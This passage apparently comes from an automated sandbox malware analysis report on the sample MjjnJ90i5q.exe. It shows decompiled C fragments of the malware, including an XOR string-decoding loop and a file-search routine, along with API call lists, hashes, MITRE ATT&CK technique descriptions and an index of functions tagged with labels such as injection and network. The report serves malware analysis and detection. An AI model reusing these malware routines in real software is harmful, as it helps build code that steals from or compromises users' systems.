							}
							__eflags = _t123 - 0x30;
							if(_t123 == 0x30) {
								L22:
								__eflags = _t170[0];
								if(_t170[0] == 0) {
									goto L29;
								}
								L23:
								_t124 = 0;
								__eflags =  *_t170;
								if( *_t170 == 0) {
									goto L29;
								} else {
									goto L24;
								}
								do {
									L24:
									_t124[_t170] = _t124[_t170] ^ 0x00000019;
									_t124 =  &(_t124[1]);
									__eflags = _t124[_t170];
								} while (_t124[_t170] != 0);
								__eflags = _t124;
								if(_t124 > 0) {
									_t171 =  &_v580;
									_t125 = 0x57;
									E00419DD3(_t125,  &_v580);
									_push(_t158);
									_push(_v676);
									_t159 = _v656;
									_push(_v652);
									_push(_v672);
									_t148 = 0x311;
									_t128 = E004126B4(_t171, 0x311, _v656, _t171);
									_t176 = _t176 + 0x14;
									__eflags = _t128;
									if(_t128 > 0) {
										_t172 = _a4;
										_t129 = E00411DB5(_t128, _t172, _t159);
										__eflags = _t129;
										if(_t129 != 0) {
											_t70 = _t172 + 4;
											 *_t70 =  &(( *(_t172 + 4))[1]);
											__eflags =  *_t70;
										}
									}
								}
								goto L29;
							}
							__eflags = _t123 - 0x31;
							if(_t123 != 0x31) {
								goto L23;
							}
							goto L22;
						}
						_v648 =  &(_t157[6]);
						E0040F058();
						_t133 = E00412040(_v648,  &_v588, 0);
						_t162 = _t133;
						__eflags = _t162 - 1;
						if(_t162 < 1) {
							goto L16;
						}
						__eflags = _t162 - 0xffff;
						 *_t133 =  *_t133 + 1;
						_t56 =  &(_t170[0]);
						 *_t56 =  &(_t170[0][_t148]);
						__eflags =  *_t56;
						L29:
						_v644 = _v644 + 1;
						__eflags = _v644 - _v648;
					} while (_v644 < _v648);
					goto L30;
				} else {
					_t173 =  &_v612;
					E00419DD3(0x90, _t173);
					_v648 = _t173;
					E004170EA( &_v524,  &_v648, _t179, 1, 5, E0040F072, _a4, 0, 0, 0);
					goto L32;
				}
			}

0x0040f072
0x0040f078
0x0040f096
0x0040f2f6
0x0040f2fe
0x0040f2fe
0x0040f09c
0x0040f09f
0x0040f0e2
0x0040f0e5
0x0040f0ea
0x0040f0ef
0x0040f0f1
0x00000000
0x00000000
0x0040f108
0x0040f10d
0x0040f111
0x0040f114
0x0040f2ed
0x0040f2f1
0x00000000
0x0040f2f1
0x0040f124
0x0040f131
0x0040f13f
0x0040f14d
0x0040f15b
0x0040f160
0x0040f164
0x0040f2d7
0x0040f2db
0x0040f2e8
0x00000000
0x0040f2e8
0x0040f16a
0x0040f16e
0x0040f172
0x00000000
0x00000000
0x0040f17e
0x0040f17e
0x0040f182
0x0040f186
0x0040f18a
0x00000000
0x00000000
0x0040f19a
0x0040f1ac
0x0040f1bc
0x0040f1cc
0x0040f1ce
0x0040f1d3
0x0040f1d5
0x00000000
0x00000000
0x0040f1db
0x0040f1e0
0x00000000
0x00000000
0x0040f1e6
0x0040f1e8
0x00000000
0x00000000
0x0040f1ee
0x0040f1f7
0x0040f1fc
0x0040f1ff
0x0040f203
0x0040f20c
0x0040f213
0x0040f218
0x0040f21a
0x0040f244
0x0040f246
0x0040f24b
0x0040f24e
0x00000000
0x00000000
0x0040f254
0x0040f257
0x00000000
0x00000000
0x0040f259
0x0040f25b
0x0040f25d
0x00000000
0x00000000
0x0040f25f
0x0040f261
0x0040f267
0x0040f267
0x0040f26b
0x00000000
0x00000000
0x0040f26d
0x0040f26d
0x0040f26f
0x0040f271
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f273
0x0040f273
0x0040f273
0x0040f277
0x0040f278
0x0040f278
0x0040f27e
0x0040f280
0x0040f284
0x0040f288
0x0040f289
0x0040f28e
0x0040f28f
0x0040f293
0x0040f297
0x0040f29d
0x0040f2a1
0x0040f2a7
0x0040f2ac
0x0040f2af
0x0040f2b1
0x0040f2b3
0x0040f2b9
0x0040f2be
0x0040f2c0
0x0040f2c2
0x0040f2c2
0x0040f2c2
0x0040f2c2
0x0040f2c0
0x0040f2b1
0x00000000
0x0040f280
0x0040f263
0x0040f265
0x00000000
0x00000000
0x00000000
0x0040f265
0x0040f221
0x0040f225
0x0040f230
0x0040f235
0x0040f237
0x0040f23a
0x00000000
0x00000000
0x0040f23c
0x0040f23f
0x0040f241
0x0040f241
0x0040f241
0x0040f2c5
0x0040f2c5
0x0040f2cd
0x0040f2cd
0x00000000
0x0040f0a1
0x0040f0a1
0x0040f0aa
0x0040f0b1
0x0040f0d1
0x00000000
0x0040f0d1

APIs

Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040F198
StrStrIA.SHLWAPI(?,?), ref: 0040F1AA
StrStrIA.SHLWAPI(?,?), ref: 0040F1BA
StrStrIA.SHLWAPI(?,?), ref: 0040F1CC

Part of subcall function 004170EA: FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00417129
Part of subcall function 004170EA: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00417150
Part of subcall function 004170EA: PathMatchSpecW.SHLWAPI(?,?), ref: 0041719A
Part of subcall function 004170EA: Sleep.KERNEL32(00000000,?,?), ref: 004171F7
Part of subcall function 004170EA: FindNextFileW.KERNEL32(?,?), ref: 00417225
Part of subcall function 004170EA: FindClose.KERNEL32(?), ref: 00417237

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: db4a474ad041ab4b6ce82ee6af083014292bd34684c1e18fb6a7feb4f6a43f51
Instruction ID: 3682acbdcad571997d0be667af768df34394ab2d48154ca1c0a0f2b0f3fca791
Opcode Fuzzy Hash: db4a474ad041ab4b6ce82ee6af083014292bd34684c1e18fb6a7feb4f6a43f51
Instruction Fuzzy Hash: CE7179355083419FC720EB25C801B9FB7E5AB89704F04097FF894A7692D779ED4ACB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041D022, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D022(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed short _t26;
				void* _t37;

				_t37 = E00412510(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x424010);
					E004119C1( *0x424004);
					 *0x424004 =  *0x424004 & 0x00000000;
					 *0x42400c = 0;
					LeaveCriticalSection(0x424010);
					return 0;
				}
				EnterCriticalSection(0x424010);
				_t26 = ( *0x42400c & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E0041194C(_t26 + _t26, 0x424004);
					if(_t13 != 0) {
						_t13 = E004119FD( *0x424004 + ( *0x42400c & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x42400c = _t26;
					}
				} else {
					_t13 = E0041194C(0x7d0, 0x424004);
					if(_t13 != 0) {
						E004119FD( *0x424004,  *0x424004 + (( *0x42400c & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + 0x3e8 - _t37);
						_t13 = E004119FD(0x3e8 - _t37 + 0x3e8 - _t37 +  *0x424004, _v8, _t37 + _t37);
						 *0x42400c = 0x3e8;
					}
				}
				LeaveCriticalSection(0x424010);
				return _t13;
			}

0x0041d02e
0x0041d037
0x0041d03f
0x0041d04b
0x0041d050
0x0041d05a
0x0041d060
0x00000000
0x0041d060
0x0041d071
0x0041d07e
0x0041d087
0x0041d0d7
0x0041d0de
0x0041d0f9
0x0041d0fe
0x0041d0fe
0x0041d089
0x0041d08e
0x0041d095
0x0041d0b2
0x0041d0c6
0x0041d0cb
0x0041d0cb
0x0041d095
0x0041d10a
0x00000000

APIs

EnterCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D03F

Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4

LeaveCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D060
EnterCriticalSection.KERNEL32(00424010,?,?,?,?,0041D315,?), ref: 0041D071
LeaveCriticalSection.KERNEL32(00424010,?,?,?,0041D315,?), ref: 0041D10A

Memory Dump Source

Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: dfb84f3d850489091a13ab81f7491ca700607ae590e634629e120d3d3b18b305
Instruction ID: 02c96cbfca19508d39190bcffc2ad04c35170359e84d8274d1aaff415282f949
Opcode Fuzzy Hash: dfb84f3d850489091a13ab81f7491ca700607ae590e634629e120d3d3b18b305
Instruction Fuzzy Hash: DE2180B1600115EBC724AFA5ED94ABA37A8EF8430CB40513BF70197172DB3958C6DB6D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MjjnJ90i5q

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: MjjnJ90i5q.exe PID: 6584 Parent PID: 5716

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: MjjnJ90i5q.exe PID: 6584 Parent PID: 5716 MjjnJ90i5q.exeCOMMON

Executed Functions

Function 00405EFF, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Function 00414FB0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 00406E89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Function 00415F64, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 0041A1A9, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Function 00406B42, Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 243
synchronizationsleepshutdownCOMMON

Function 0041CCDE, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 004132E3, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0041115E, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Function 004090BA, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Function 0041D1BF, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Function 0041A01E, Relevance: 12.1, APIs: 8, Instructions: 116
processCOMMON

Function 004170EA, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 0041308D, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 00408DB8, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Function 00413803, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Function 00404F00, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Function 0041702F, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0040A8D1, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 0041848E, Relevance: 6.3, APIs: 4, Instructions: 303
COMMON

Function 0041631A, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 00408D01, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Function 0040D161, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Function 0041D883, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 0040D880, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Function 0040C68A, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Function 00411AEB, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 00412B72, Relevance: 1.3, Strings: 1, Instructions: 70
COMMONCrypto

Function 004021EB, Relevance: .2, Instructions: 236
COMMONCrypto

Function 00414714, Relevance: .2, Instructions: 190
COMMONCrypto

Function 00419823, Relevance: .1, Instructions: 117
COMMON

Function 0040BC64, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 0041A756, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205
filewindowregistryCOMMON

Function 00409FC5, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Function 004193F1, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 182
networkCOMMON

Function 0041AC8D, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 004156A7, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 00407F00, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Function 0041AC8B, Relevance: 18.1, APIs: 12, Instructions: 101
windowCOMMON

Function 0041A9C1, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 0040C445, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Function 0040874C, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Function 0040B3B9, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 216
filestringCOMMON

Function 004051AB, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Function 0041C50A, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Function 00405DDE, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Function 004136A9, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67
networkCOMMON

Function 00419A5A, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Function 00407BE6, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Function 00418EB0, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 367
timenetworkCOMMON

Function 0040E211, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Function 00408EE1, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Function 004073F7, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Function 00404C77, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Function 0041BD84, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Function 0041D5CB, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Function 004082BE, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Function 00418A36, Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 395
networkCOMMON

Function 00406388, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Function 00413481, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Function 00407257, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 85
fileCOMMON

Function 00413115, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Function 00415EDB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON